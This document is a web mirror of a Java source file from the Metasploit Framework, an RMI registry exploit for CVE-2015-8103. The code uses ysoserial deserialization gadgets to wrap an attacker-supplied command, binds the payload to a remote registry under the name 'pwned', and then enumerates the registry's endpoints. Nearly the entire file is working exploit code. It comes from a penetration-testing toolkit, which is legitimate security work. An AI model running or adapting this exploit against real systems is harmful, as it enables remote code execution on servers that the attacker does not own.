CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/external/source/exploits/CVE-2015-8103/RMIRegistryExploit.java
Views: 11779
1
package ysoserial;

2


3
import java.rmi.Remote;

4
import java.rmi.registry.LocateRegistry;

5
import java.rmi.registry.Registry;

6
import java.util.Arrays;

7
import java.util.concurrent.Callable;

8


9
import ysoserial.payloads.CommonsCollections1;

10
import ysoserial.payloads.ObjectPayload;

11
import ysoserial.payloads.util.Gadgets;

12


13
/*

14
 * Utility program for exploiting RMI registries running with required gadgets available in their ClassLoader.

15
 * Attempts to exploit the registry itself, then enumerates registered endpoints and their interfaces.

16
 * 

17
 * TODO: automatic exploitation of endpoints, potentially with automated download and use of jars containing remote

18
 * interfaces. See http://www.findmaven.net/api/find/class/org.springframework.remoting.rmi.RmiInvocationHandler .

19
 */

20
public class RMIRegistryExploit {

21
	public static void main(final String[] args) throws Exception {

22
		// ensure payload doesn't detonate during construction or deserialization 

23
		ExecBlockingSecurityManager.wrap(new Callable<Void>(){public Void call() throws Exception {

24
			Registry registry = LocateRegistry.getRegistry(args[0], Integer.parseInt(args[1]));		

25
			String className = CommonsCollections1.class.getPackage().getName() +  "." + args[2];

26
			Class<? extends ObjectPayload> payloadClass = (Class<? extends ObjectPayload>) Class.forName(className);

27
			Object payload = payloadClass.newInstance().getObject(args[3]);

28
			Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap("pwned", payload), Remote.class);

29
			try {

30
				registry.bind("pwned", remote);

31
			} catch (Throwable e) {

32
				e.printStackTrace();

33
			}			

34
			

35
			try {

36
				String[] names = registry.list();

37
				for (String name : names) {

38
					System.out.println("looking up '" + name + "'");

39
					try {

40
						Remote rem = registry.lookup(name);

41
						System.out.println(Arrays.asList(rem.getClass().getInterfaces()));

42
					} catch (Throwable e) {

43
						e.printStackTrace();

44
					}					

45
				}

46
			} catch (Throwable e) {

47
				e.printStackTrace();

48
			}

49
			

50
			return null;

51
		}});

52
	}

53
}

54


55